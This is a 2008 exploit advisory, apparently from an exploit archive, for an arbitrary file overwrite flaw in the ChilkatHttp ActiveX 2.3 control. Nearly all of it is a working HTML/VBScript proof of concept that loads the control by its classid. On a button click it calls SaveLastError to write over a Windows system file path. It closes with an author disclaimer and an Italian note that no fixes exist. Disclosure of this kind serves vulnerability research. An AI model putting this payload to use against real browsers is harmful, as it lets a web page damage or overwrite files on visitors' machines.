ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite Exploit

2008-04-01 00:00:00

--------------------------------------------------------------------
ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite
url: www.chilkatsoft.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
--------------------------------------------------------------------
<object classid='clsid:B973393F-27C7-4781-877D-8626AAEDF119' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
test.SaveLastError "c:\windows\system_.ini"
MsgBox "Exploit completed!"
End Sub
</script>

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.